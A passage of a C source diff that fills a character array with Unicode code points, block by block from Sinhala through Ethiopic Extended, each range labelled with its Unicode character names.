+	while (c <= 0xdb1)	// ..to SINHALA LETTER DANTAJA NAYANNA
+		charset[i++] = c++;
+	c = 0xdb3;		// from SINHALA LETTER SANYAKA DAYANNA
+	while (c <= 0xdbb)	// ..to SINHALA LETTER RAYANNA
+		charset[i++] = c++;
+	c = 0xdc0;		// from SINHALA LETTER VAYANNA
+	while (c <= 0xdc6)	// ..to SINHALA LETTER FAYANNA
+		charset[i++] = c++;
+	c = 0xdcf;		// from SINHALA VOWEL SIGN AELA-PILLA
+	while (c <= 0xdd4)	// ..to SINHALA VOWEL SIGN KETTI PAA-PILLA
+		charset[i++] = c++;
+	c = 0xdd8;		// from SINHALA VOWEL SIGN GAETTA-PILLA
+	while (c <= 0xddf)	// ..to SINHALA VOWEL SIGN GAYANUKITTA
+		charset[i++] = c++;
+	c = 0xde6;		// from SINHALA LITH DIGIT ZERO
+	while (c <= 0xdef)	// ..to SINHALA LITH DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xdf2;	// SINHALA VOWEL SIGN DIGA GAETTA-PILLA
+	charset[i++] = 0xdf4;	// SINHALA PUNCTUATION KUNDDALIYA
+// 0E00..0E7F; Thai
+	c = 0xe01;		// from THAI CHARACTER KO KAI
+	while (c <= 0xe3a)	// ..to THAI CHARACTER PHINTHU
+		charset[i++] = c++;
+	c = 0xe3f;		// from THAI CURRENCY SYMBOL BAHT
+	while (c <= 0xe5b)	// ..to THAI CHARACTER KHOMUT
+		charset[i++] = c++;
+// 0E80..0EFF; Lao
+	charset[i++] = 0xe81;	// LAO LETTER KO
+	charset[i++] = 0xe82;	// LAO LETTER KHO SUNG
+	charset[i++] = 0xe87;	// LAO LETTER NGO
+	charset[i++] = 0xe88;	// LAO LETTER CO
+	c = 0xe94;		// from LAO LETTER DO
+	while (c <= 0xe97)	// ..to LAO LETTER THO TAM
+		charset[i++] = c++;
+	c = 0xe99;		// from LAO LETTER NO
+	while (c <= 0xe9f)	// ..to LAO LETTER FO SUNG
+		charset[i++] = c++;
+	charset[i++] = 0xea1;	// LAO LETTER MO
+	charset[i++] = 0xea3;	// LAO LETTER LO LING
+	charset[i++] = 0xeaa;	// LAO LETTER SO SUNG
+	charset[i++] = 0xeab;	// LAO LETTER HO SUNG
+	c = 0xead;		// from LAO LETTER O
+	while (c <= 0xeb9)	// ..to LAO VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xebb;	// LAO VOWEL SIGN MAI KON
+	charset[i++] = 0xebd;	// LAO SEMIVOWEL SIGN NYO
+	c = 0xec0;		// from LAO VOWEL SIGN E
+	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
+		charset[i++] = c++;
+	c = 0xec8;		// from LAO TONE MAI EK
+	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+		charset[i++] = c++;
+	c = 0xed0;		// from LAO DIGIT ZERO
+	while (c <= 0xed9)	// ..to LAO DIGIT NINE
+		charset[i++] = c++;
+	c = 0xedc;		// from LAO HO NO
+	while (c <= 0xedf)	// ..to LAO LETTER KHMU NYO
+		charset[i++] = c++;
+// 0F00..0FFF; Tibetan
+	c = 0xf00;		// from TIBETAN SYLLABLE OM
+	while (c <= 0xf47)	// ..to TIBETAN LETTER JA
+		charset[i++] = c++;
+	c = 0xf49;		// from TIBETAN LETTER NYA
+	while (c <= 0xf6c)	// ..to TIBETAN LETTER RRA
+		charset[i++] = c++;
+	c = 0xf71;		// from TIBETAN VOWEL SIGN AA
+	while (c <= 0xf97)	// ..to TIBETAN SUBJOINED LETTER JA
+		charset[i++] = c++;
+	c = 0xf99;		// from TIBETAN SUBJOINED LETTER NYA
+	while (c <= 0xfbc)	// ..to TIBETAN SUBJOINED LETTER FIXED-FORM RA
+		charset[i++] = c++;
+	c = 0xfbe;		// from TIBETAN KU RU KHA
+	while (c <= 0xfcc)	// ..to TIBETAN SYMBOL NOR BU BZHI -KHYIL
+		charset[i++] = c++;
+	c = 0xfce;		// from TIBETAN SIGN RDEL NAG RDEL DKAR
+	while (c <= 0xfda)	// ..to TIBETAN MARK TRAILING MCHAN RTAGS
+		charset[i++] = c++;
+// 1000..109F; Myanmar
+	c = 0x1000;		// from MYANMAR LETTER KA
+	while (c <= 0x109f)	// ..to MYANMAR SYMBOL SHAN EXCLAMATION
+		charset[i++] = c++;
+// 10A0..10FF; Georgian
+	c = 0x10a0;		// from GEORGIAN CAPITAL LETTER AN
+	while (c <= 0x10c5)	// ..to GEORGIAN CAPITAL LETTER HOE
+		charset[i++] = c++;
+	c = 0x10d0;		// from GEORGIAN LETTER AN
+	while (c <= 0x10ff)	// ..to GEORGIAN LETTER LABIAL SIGN
+		charset[i++] = c++;
+// 1100..11FF; Hangul Jamo
+	c = 0x1100;		// from HANGUL CHOSEONG KIYEOK
+	while (c <= 0x11ff)	// ..to HANGUL JONGSEONG SSANGNIEUN
+		charset[i++] = c++;
+// 1200..137F; Ethiopic
+	c = 0x1200;		// from ETHIOPIC SYLLABLE HA
+	while (c <= 0x1248)	// ..to ETHIOPIC SYLLABLE QWA
+		charset[i++] = c++;
+	c = 0x124a;		// from ETHIOPIC SYLLABLE QWI
+	while (c <= 0x124d)	// ..to ETHIOPIC SYLLABLE QWE
+		charset[i++] = c++;
+	c = 0x1250;		// from ETHIOPIC SYLLABLE QHA
+	while (c <= 0x1256)	// ..to ETHIOPIC SYLLABLE QHO
+		charset[i++] = c++;
+	c = 0x125a;		// from ETHIOPIC SYLLABLE QHWI
+	while (c <= 0x125d)	// ..to ETHIOPIC SYLLABLE QHWE
+		charset[i++] = c++;
+	c = 0x1260;		// from ETHIOPIC SYLLABLE BA
+	while (c <= 0x1288)	// ..to ETHIOPIC SYLLABLE XWA
+		charset[i++] = c++;
+	c = 0x128a;		// from ETHIOPIC SYLLABLE XWI
+	while (c <= 0x128d)	// ..to ETHIOPIC SYLLABLE XWE
+		charset[i++] = c++;
+	c = 0x1290;		// from ETHIOPIC SYLLABLE NA
+	while (c <= 0x12b0)	// ..to ETHIOPIC SYLLABLE KWA
+		charset[i++] = c++;
+	c = 0x12b2;		// from ETHIOPIC SYLLABLE KWI
+	while (c <= 0x12b5)	// ..to ETHIOPIC SYLLABLE KWE
+		charset[i++] = c++;
+	c = 0x12b8;		// from ETHIOPIC SYLLABLE KXA
+	while (c <= 0x12be)	// ..to ETHIOPIC SYLLABLE KXO
+		charset[i++] = c++;
+	c = 0x12c2;		// from ETHIOPIC SYLLABLE KXWI
+	while (c <= 0x12c5)	// ..to ETHIOPIC SYLLABLE KXWE
+		charset[i++] = c++;
+	c = 0x12c8;		// from ETHIOPIC SYLLABLE WA
+	while (c <= 0x12d6)	// ..to ETHIOPIC SYLLABLE PHARYNGEAL O
+		charset[i++] = c++;
+	c = 0x12d8;		// from ETHIOPIC SYLLABLE ZA
+	while (c <= 0x1310)	// ..to ETHIOPIC SYLLABLE GWA
+		charset[i++] = c++;
+	c = 0x1312;		// from ETHIOPIC SYLLABLE GWI
+	while (c <= 0x1315)	// ..to ETHIOPIC SYLLABLE GWE
+		charset[i++] = c++;
+	c = 0x1318;		// from ETHIOPIC SYLLABLE GGA
+	while (c <= 0x135a)	// ..to ETHIOPIC SYLLABLE FYA
+		charset[i++] = c++;
+	c = 0x135d;		// from ETHIOPIC COMBINING GEMINATION AND VOWEL LENGTH MARK
+	while (c <= 0x137c)	// ..to ETHIOPIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 1380..139F; Ethiopic Supplement
+	c = 0x1380;		// from ETHIOPIC SYLLABLE SEBATBEIT MWA
+	while (c <= 0x1399)	// ..to ETHIOPIC TONAL MARK KURT
+		charset[i++] = c++;
+// 13A0..13FF; Cherokee
+	c = 0x13a0;		// from CHEROKEE LETTER A
+	while (c <= 0x13f5)	// ..to CHEROKEE LETTER MV
+		charset[i++] = c++;
+	c = 0x13f8;		// from CHEROKEE SMALL LETTER YE
+	while (c <= 0x13fd)	// ..to CHEROKEE SMALL LETTER MV
+		charset[i++] = c++;
+// 1400..167F; Unified Canadian Aboriginal Syllabics
+	c = 0x1400;		// from CANADIAN SYLLABICS HYPHEN
+	while (c <= 0x167f)	// ..to CANADIAN SYLLABICS BLACKFOOT W
+		charset[i++] = c++;
+// 1680..169F; Ogham
+	c = 0x1680;		// from OGHAM SPACE MARK
+	while (c <= 0x169c)	// ..to OGHAM REVERSED FEATHER MARK
+		charset[i++] = c++;
+// 16A0..16FF; Runic
+	c = 0x16a0;		// from RUNIC LETTER FEHU FEOH FE F
+	while (c <= 0x16f8)	// ..to RUNIC LETTER FRANKS CASKET AESC
+		charset[i++] = c++;
+// 1700..171F; Tagalog
+	c = 0x1700;		// from TAGALOG LETTER A
+	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
+		charset[i++] = c++;
+	c = 0x170e;		// from TAGALOG LETTER LA
+	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+		charset[i++] = c++;
+// 1720..173F; Hanunoo
+	c = 0x1720;		// from HANUNOO LETTER A
+	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
+		charset[i++] = c++;
+// 1740..175F; Buhid
+	c = 0x1740;		// from BUHID LETTER A
+	while (c <= 0x1753)	// ..to BUHID VOWEL SIGN U
+		charset[i++] = c++;
+// 1760..177F; Tagbanwa
+	c = 0x1760;		// from TAGBANWA LETTER A
+	while (c <= 0x176c)	// ..to TAGBANWA LETTER YA
+		charset[i++] = c++;
+	charset[i++] = 0x176e;	// TAGBANWA LETTER LA
+	charset[i++] = 0x1770;	// TAGBANWA LETTER SA
+	charset[i++] = 0x1772;	// TAGBANWA VOWEL SIGN I
+	charset[i++] = 0x1773;	// TAGBANWA VOWEL SIGN U
+// 1780..17FF; Khmer
+	c = 0x1780;		// from KHMER LETTER KA
+	while (c <= 0x17dd)	// ..to KHMER SIGN ATTHACAN
+		charset[i++] = c++;
+	c = 0x17e0;		// from KHMER DIGIT ZERO
+	while (c <= 0x17e9)	// ..to KHMER DIGIT NINE
+		charset[i++] = c++;
+	c = 0x17f0;		// from KHMER SYMBOL LEK ATTAK SON
+	while (c <= 0x17f9)	// ..to KHMER SYMBOL LEK ATTAK PRAM-BUON
+		charset[i++] = c++;
+// 1800..18AF; Mongolian
+	c = 0x1800;		// from MONGOLIAN BIRGA
+	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
+		charset[i++] = c++;
+	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
+	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1820;		// from MONGOLIAN LETTER A
+	while (c <= 0x1878)	// ..to MONGOLIAN LETTER CHA WITH TWO DOTS
+		charset[i++] = c++;
+	c = 0x1880;		// from MONGOLIAN LETTER ALI GALI ANUSVARA ONE
+	while (c <= 0x18aa)	// ..to MONGOLIAN LETTER MANCHU ALI GALI LHA
+		charset[i++] = c++;
+// 18B0..18FF; Unified Canadian Aboriginal Syllabics Extended
+	c = 0x18b0;		// from CANADIAN SYLLABICS OY
+	while (c <= 0x18f5)	// ..to CANADIAN SYLLABICS CARRIER DENTAL S
+		charset[i++] = c++;
+// 1900..194F; Limbu
+	c = 0x1900;		// from LIMBU VOWEL-CARRIER LETTER
+	while (c <= 0x191e)	// ..to LIMBU LETTER TRA
+		charset[i++] = c++;
+	c = 0x1920;		// from LIMBU VOWEL SIGN A
+	while (c <= 0x192b)	// ..to LIMBU SUBJOINED LETTER WA
+		charset[i++] = c++;
+	c = 0x1930;		// from LIMBU SMALL LETTER KA
+	while (c <= 0x193b)	// ..to LIMBU SIGN SA-I
+		charset[i++] = c++;
+	c = 0x1944;		// from LIMBU EXCLAMATION MARK
+	while (c <= 0x194f)	// ..to LIMBU DIGIT NINE
+		charset[i++] = c++;
+// 1950..197F; Tai Le
+	c = 0x1950;		// from TAI LE LETTER KA
+	while (c <= 0x196d)	// ..to TAI LE LETTER AI
+		charset[i++] = c++;
+	c = 0x1970;		// from TAI LE LETTER TONE-2
+	while (c <= 0x1974)	// ..to TAI LE LETTER TONE-6
+		charset[i++] = c++;
+// 1980..19DF; New Tai Lue
+	c = 0x1980;		// from NEW TAI LUE LETTER HIGH QA
+	while (c <= 0x19ab)	// ..to NEW TAI LUE LETTER LOW SUA
+		charset[i++] = c++;
+	c = 0x19b0;		// from NEW TAI LUE VOWEL SIGN VOWEL SHORTENER
+	while (c <= 0x19c9)	// ..to NEW TAI LUE TONE MARK-2
+		charset[i++] = c++;
+	c = 0x19d0;		// from NEW TAI LUE DIGIT ZERO
+	while (c <= 0x19da)	// ..to NEW TAI LUE THAM DIGIT ONE
+		charset[i++] = c++;
+	charset[i++] = 0x19de;	// NEW TAI LUE SIGN LAE
+	charset[i++] = 0x19df;	// NEW TAI LUE SIGN LAEV
+// 19E0..19FF; Khmer Symbols
+	c = 0x19e0;		// from KHMER SYMBOL PATHAMASAT
+	while (c <= 0x19ff)	// ..to KHMER SYMBOL DAP-PRAM ROC
+		charset[i++] = c++;
+// 1A00..1A1F; Buginese
+	c = 0x1a00;		// from BUGINESE LETTER KA
+	while (c <= 0x1a1b)	// ..to BUGINESE VOWEL SIGN AE
+		charset[i++] = c++;
+	charset[i++] = 0x1a1e;	// BUGINESE PALLAWA
+	charset[i++] = 0x1a1f;	// BUGINESE END OF SECTION
+// 1A20..1AAF; Tai Tham
+	c = 0x1a20;		// from TAI THAM LETTER HIGH KA
+	while (c <= 0x1a5e)	// ..to TAI THAM CONSONANT SIGN SA
+		charset[i++] = c++;
+	c = 0x1a60;		// from TAI THAM SIGN SAKOT
+	while (c <= 0x1a7c)	// ..to TAI THAM SIGN KHUEN-LUE KARAN
+		charset[i++] = c++;
+	c = 0x1a7f;		// from TAI THAM COMBINING CRYPTOGRAMMIC DOT
+	while (c <= 0x1a89)	// ..to TAI THAM HORA DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1a90;		// from TAI THAM THAM DIGIT ZERO
+	while (c <= 0x1a99)	// ..to TAI THAM THAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1aa0;		// from TAI THAM SIGN WIANG
+	while (c <= 0x1aad)	// ..to TAI THAM SIGN CAANG
+		charset[i++] = c++;
+// 1AB0..1AFF; Combining Diacritical Marks Extended
+	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
+	while (c <= 0x1abe)	// ..to COMBINING PARENTHESES OVERLAY
+		charset[i++] = c++;
+// 1B00..1B7F; Balinese
+	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
+	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+		charset[i++] = c++;
+	c = 0x1b50;		// from BALINESE DIGIT ZERO
+	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+		charset[i++] = c++;
+// 1B80..1BBF; Sundanese
+	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
+	while (c <= 0x1bbf)	// ..to SUNDANESE LETTER FINAL M
+		charset[i++] = c++;
+// 1BC0..1BFF; Batak
+	c = 0x1bc0;		// from BATAK LETTER A
+	while (c <= 0x1bf3)	// ..to BATAK PANONGONAN
+		charset[i++] = c++;
+	c = 0x1bfc;		// from BATAK SYMBOL BINDU NA METEK
+	while (c <= 0x1bff)	// ..to BATAK SYMBOL BINDU PANGOLAT
+		charset[i++] = c++;
+// 1C00..1C4F; Lepcha
+	c = 0x1c00;		// from LEPCHA LETTER KA
+	while (c <= 0x1c37)	// ..to LEPCHA SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x1c3b;		// from LEPCHA PUNCTUATION TA-ROL
+	while (c <= 0x1c49)	// ..to LEPCHA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1c4d;	// LEPCHA LETTER TTA
+	charset[i++] = 0x1c4f;	// LEPCHA LETTER DDA
+// 1C50..1C7F; Ol Chiki
+	c = 0x1c50;		// from OL CHIKI DIGIT ZERO
+	while (c <= 0x1c7f)	// ..to OL CHIKI PUNCTUATION DOUBLE MUCAAD
+		charset[i++] = c++;
+// 1C80..1C8F; Cyrillic Extended-C
+	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
+	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+		charset[i++] = c++;
+// 1C90..1CBF; Georgian Extended
+	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
+	while (c <= 0x1cba)	// ..to GEORGIAN MTAVRULI CAPITAL LETTER AIN
+		charset[i++] = c++;
+	charset[i++] = 0x1cbd;	// GEORGIAN MTAVRULI CAPITAL LETTER AEN
+	charset[i++] = 0x1cbf;	// GEORGIAN MTAVRULI CAPITAL LETTER LABIAL SIGN
+// 1CC0..1CCF; Sundanese Supplement
+	c = 0x1cc0;		// from SUNDANESE PUNCTUATION BINDU SURYA
+	while (c <= 0x1cc7)	// ..to SUNDANESE PUNCTUATION BINDU BA SATANGA
+		charset[i++] = c++;
+// 1CD0..1CFF; Vedic Extensions
+	c = 0x1cd0;		// from VEDIC TONE KARSHANA
+	while (c <= 0x1cf9)	// ..to VEDIC TONE DOUBLE RING ABOVE
+		charset[i++] = c++;
+// 1D00..1D7F; Phonetic Extensions
+	c = 0x1d00;		// from LATIN LETTER SMALL CAPITAL A
+	while (c <= 0x1d7f)	// ..to LATIN SMALL LETTER UPSILON WITH STROKE
+		charset[i++] = c++;
+// 1D80..1DBF; Phonetic Extensions Supplement
+	c = 0x1d80;		// from LATIN SMALL LETTER B WITH PALATAL HOOK
+	while (c <= 0x1dbf)	// ..to MODIFIER LETTER SMALL THETA
+		charset[i++] = c++;
+// 1DC0..1DFF; Combining Diacritical Marks Supplement
+	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
+	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
+		charset[i++] = c++;
+	c = 0x1dfb;		// from COMBINING DELETION MARK
+	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
+		charset[i++] = c++;
+// 1E00..1EFF; Latin Extended Additional
+	c = 0x1e00;		// from LATIN CAPITAL LETTER A WITH RING BELOW
+	while (c <= 0x1eff)	// ..to LATIN SMALL LETTER Y WITH LOOP
+		charset[i++] = c++;
+// 1F00..1FFF; Greek Extended
+	c = 0x1f00;		// from GREEK SMALL LETTER ALPHA WITH PSILI
+	while (c <= 0x1f15)	// ..to GREEK SMALL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f18;		// from GREEK CAPITAL LETTER EPSILON WITH PSILI
+	while (c <= 0x1f1d)	// ..to GREEK CAPITAL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f20;		// from GREEK SMALL LETTER ETA WITH PSILI
+	while (c <= 0x1f45)	// ..to GREEK SMALL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f48;		// from GREEK CAPITAL LETTER OMICRON WITH PSILI
+	while (c <= 0x1f4d)	// ..to GREEK CAPITAL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f50;		// from GREEK SMALL LETTER UPSILON WITH PSILI
+	while (c <= 0x1f57)	// ..to GREEK SMALL LETTER UPSILON WITH DASIA AND PERISPOMENI
+		charset[i++] = c++;
+	c = 0x1f5f;		// from GREEK CAPITAL LETTER UPSILON WITH DASIA AND PERISPOMENI
+	while (c <= 0x1f7d)	// ..to GREEK SMALL LETTER OMEGA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1f80;		// from GREEK SMALL LETTER ALPHA WITH PSILI AND YPOGEGRAMMENI
+	while (c <= 0x1fb4)	// ..to GREEK SMALL LETTER ALPHA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fb6;		// from GREEK SMALL LETTER ALPHA WITH PERISPOMENI
+	while (c <= 0x1fc4)	// ..to GREEK SMALL LETTER ETA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fc6;		// from GREEK SMALL LETTER ETA WITH PERISPOMENI
+	while (c <= 0x1fd3)	// ..to GREEK SMALL LETTER IOTA WITH DIALYTIKA AND OXIA
+		charset[i++] = c++;
+	c = 0x1fd6;		// from GREEK SMALL LETTER IOTA WITH PERISPOMENI
+	while (c <= 0x1fdb)	// ..to GREEK CAPITAL LETTER IOTA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1fdd;		// from GREEK DASIA AND VARIA
+	while (c <= 0x1fef)	// ..to GREEK VARIA
+		charset[i++] = c++;
+	charset[i++] = 0x1ff2;	// GREEK SMALL LETTER OMEGA WITH VARIA AND YPOGEGRAMMENI
+	charset[i++] = 0x1ff4;	// GREEK SMALL LETTER OMEGA WITH OXIA AND YPOGEGRAMMENI
+	c = 0x1ff6;		// from GREEK SMALL LETTER OMEGA WITH PERISPOMENI
+	while (c <= 0x1ffe)	// ..to GREEK DASIA
+		charset[i++] = c++;
+// 2000..206F; General Punctuation
+	c = 0x2000;		// from EN QUAD
+	while (c <= 0x2064)	// ..to INVISIBLE PLUS
+		charset[i++] = c++;
+	c = 0x2066;		// from LEFT-TO-RIGHT ISOLATE
+	while (c <= 0x206f)	// ..to NOMINAL DIGIT SHAPES
+		charset[i++] = c++;
+// 2070..209F; Superscripts and Subscripts
+	charset[i++] = 0x2070;	// SUPERSCRIPT ZERO
+	charset[i++] = 0x2071;	// SUPERSCRIPT LATIN SMALL LETTER I
+	c = 0x2074;		// from SUPERSCRIPT FOUR
+	while (c <= 0x208e)	// ..to SUBSCRIPT RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0x2090;		// from LATIN SUBSCRIPT SMALL LETTER A
+	while (c <= 0x209c)	// ..to LATIN SUBSCRIPT SMALL LETTER T
+		charset[i++] = c++;
+// 20A0..20CF; Currency Symbols
+	c = 0x20a0;		// from EURO-CURRENCY SIGN
+	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+		charset[i++] = c++;
+// 20D0..20FF; Combining Diacritical Marks for Symbols
+	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
+	while (c <= 0x20f0)	// ..to COMBINING ASTERISK ABOVE
+		charset[i++] = c++;
+// 2100..214F; Letterlike Symbols
+	c = 0x2100;		// from ACCOUNT OF
+	while (c <= 0x214f)	// ..to SYMBOL FOR SAMARITAN SOURCE
+		charset[i++] = c++;
+// 2150..218F; Number Forms
+	c = 0x2150;		// from VULGAR FRACTION ONE SEVENTH
+	while (c <= 0x218b)	// ..to TURNED DIGIT THREE
+		charset[i++] = c++;
+// 2190..21FF; Arrows
+	c = 0x2190;		// from LEFTWARDS ARROW
+	while (c <= 0x21ff)	// ..to LEFT RIGHT OPEN-HEADED ARROW
+		charset[i++] = c++;
+// 2200..22FF; Mathematical Operators
+	c = 0x2200;		// from FOR ALL
+	while (c <= 0x22ff)	// ..to Z NOTATION BAG MEMBERSHIP
+		charset[i++] = c++;
+// 2300..23FF; Miscellaneous Technical
+	c = 0x2300;		// from DIAMETER SIGN
+	while (c <= 0x23ff)	// ..to OBSERVER EYE SYMBOL
+		charset[i++] = c++;
+// 2400..243F; Control Pictures
+	c = 0x2400;		// from SYMBOL FOR NULL
+	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+		charset[i++] = c++;
+// 2440..245F; Optical Character Recognition
+	c = 0x2440;		// from OCR HOOK
+	while (c <= 0x244a)	// ..to OCR DOUBLE BACKSLASH
+		charset[i++] = c++;
+// 2460..24FF; Enclosed Alphanumerics
+	c = 0x2460;		// from CIRCLED DIGIT ONE
+	while (c <= 0x24ff)	// ..to NEGATIVE CIRCLED DIGIT ZERO
+		charset[i++] = c++;
+// 2500..257F; Box Drawing
+	c = 0x2500;		// from BOX DRAWINGS LIGHT HORIZONTAL
+	while (c <= 0x257f)	// ..to BOX DRAWINGS HEAVY UP AND LIGHT DOWN
+		charset[i++] = c++;
+// 2580..259F; Block Elements
+	c = 0x2580;		// from UPPER HALF BLOCK
+	while (c <= 0x259f)	// ..to QUADRANT UPPER RIGHT AND LOWER LEFT AND LOWER RIGHT
+		charset[i++] = c++;
+// 25A0..25FF; Geometric Shapes
+	c = 0x25a0;		// from BLACK SQUARE
+	while (c <= 0x25ff)	// ..to LOWER RIGHT TRIANGLE
+		charset[i++] = c++;
+// 2600..26FF; Miscellaneous Symbols
+	c = 0x2600;		// from BLACK SUN WITH RAYS
+	while (c <= 0x26ff)	// ..to WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE
+		charset[i++] = c++;
+// 2700..27BF; Dingbats
+	c = 0x2700;		// from BLACK SAFETY SCISSORS
+	while (c <= 0x27bf)	// ..to DOUBLE CURLY LOOP
+		charset[i++] = c++;
+// 27C0..27EF; Miscellaneous Mathematical Symbols-A
+	c = 0x27c0;		// from THREE DIMENSIONAL ANGLE
+	while (c <= 0x27ef)	// ..to MATHEMATICAL RIGHT FLATTENED PARENTHESIS
+		charset[i++] = c++;
+// 27F0..27FF; Supplemental Arrows-A
+	c = 0x27f0;		// from UPWARDS QUADRUPLE ARROW
+	while (c <= 0x27ff)	// ..to LONG RIGHTWARDS SQUIGGLE ARROW
+		charset[i++] = c++;
+// 2800..28FF; Braille Patterns
+	c = 0x2800;		// from BRAILLE PATTERN BLANK
+	while (c <= 0x28ff)	// ..to BRAILLE PATTERN DOTS-12345678
+		charset[i++] = c++;
+// 2900..297F; Supplemental Arrows-B
+	c = 0x2900;		// from RIGHTWARDS TWO-HEADED ARROW WITH VERTICAL STROKE
+	while (c <= 0x297f)	// ..to DOWN FISH TAIL
+		charset[i++] = c++;
+// 2980..29FF; Miscellaneous Mathematical Symbols-B
+	c = 0x2980;		// from TRIPLE VERTICAL BAR DELIMITER
+	while (c <= 0x29ff)	// ..to MINY
+		charset[i++] = c++;
+// 2A00..2AFF; Supplemental Mathematical Operators
+	c = 0x2a00;		// from N-ARY CIRCLED DOT OPERATOR
+	while (c <= 0x2aff)	// ..to N-ARY WHITE VERTICAL BAR
+		charset[i++] = c++;
+// 2B00..2BFF; Miscellaneous Symbols and Arrows
+	c = 0x2b00;		// from NORTH EAST WHITE ARROW
+	while (c <= 0x2b73)	// ..to DOWNWARDS TRIANGLE-HEADED ARROW TO BAR
+		charset[i++] = c++;
+	c = 0x2b76;		// from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
+	while (c <= 0x2b95)	// ..to RIGHTWARDS BLACK ARROW
+		charset[i++] = c++;
+	c = 0x2b98;		// from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
+	while (c <= 0x2bc8)	// ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
+		charset[i++] = c++;
+	c = 0x2bca;		// from TOP HALF BLACK CIRCLE
+	while (c <= 0x2bfe)	// ..to REVERSED RIGHT ANGLE
+		charset[i++] = c++;
+// 2C00..2C5F; Glagolitic
+	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
+	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
+	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+// 2C60..2C7F; Latin Extended-C
+	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
+	while (c <= 0x2c7f)	// ..to LATIN CAPITAL LETTER Z WITH SWASH TAIL
+		charset[i++] = c++;
+// 2C80..2CFF; Coptic
+	c = 0x2c80;		// from COPTIC CAPITAL LETTER ALFA
+	while (c <= 0x2cf3)	// ..to COPTIC SMALL LETTER BOHAIRIC KHEI
+		charset[i++] = c++;
+	c = 0x2cf9;		// from COPTIC OLD NUBIAN FULL STOP
+	while (c <= 0x2cff)	// ..to COPTIC MORPHOLOGICAL DIVIDER
+		charset[i++] = c++;
+// 2D00..2D2F; Georgian Supplement
+	c = 0x2d00;		// from GEORGIAN SMALL LETTER AN
+	while (c <= 0x2d25)	// ..to GEORGIAN SMALL LETTER HOE
+		charset[i++] = c++;
+	c = 0x2d27;		// from GEORGIAN SMALL LETTER YN
+	while (c <= 0x2d2d)	// ..to GEORGIAN SMALL LETTER AEN
+		charset[i++] = c++;
+// 2D30..2D7F; Tifinagh
+	c = 0x2d30;		// from TIFINAGH LETTER YA
+	while (c <= 0x2d67)	// ..to TIFINAGH LETTER YO
+		charset[i++] = c++;
+	charset[i++] = 0x2d6f;	// TIFINAGH MODIFIER LETTER LABIALIZATION MARK
+	charset[i++] = 0x2d70;	// TIFINAGH SEPARATOR MARK
+	charset[i++] = 0x2d7f;	// TIFINAGH CONSONANT JOINER
+// 2D80..2DDF; Ethiopic Extended
+	c = 0x2d80;		// from ETHIOPIC SYLLABLE LOA
+	while (c <= 0x2d96)	// ..to ETHIOPIC SYLLABLE GGWE
+		charset[i++] = c++;
+	c = 0x2da0;		// from ETHIOPIC SYLLABLE SSA
+	while (c <= 0x2da6)	// ..to ETHIOPIC SYLLABLE SSO
+		charset[i++] = c++;
+	c = 0x2da8;		// from ETHIOPIC SYLLABLE CCA
+	while (c <= 0x2dae)	// ..to ETHIOPIC SYLLABLE CCO
+		charset[i++] = c++;
+	c = 0x2db0;		// from ETHIOPIC SYLLABLE ZZA
+	while (c <= 0x2db6)	// ..to ETHIOPIC SYLLABLE ZZO
+		charset[i++] = c++;
+	c = 0x2db8;		// from ETHIOPIC SYLLABLE CCHA
+	while (c <= 0x2dbe)	// ..to ETHIOPIC SYLLABLE CCHO
+		charset[i++] = c++;
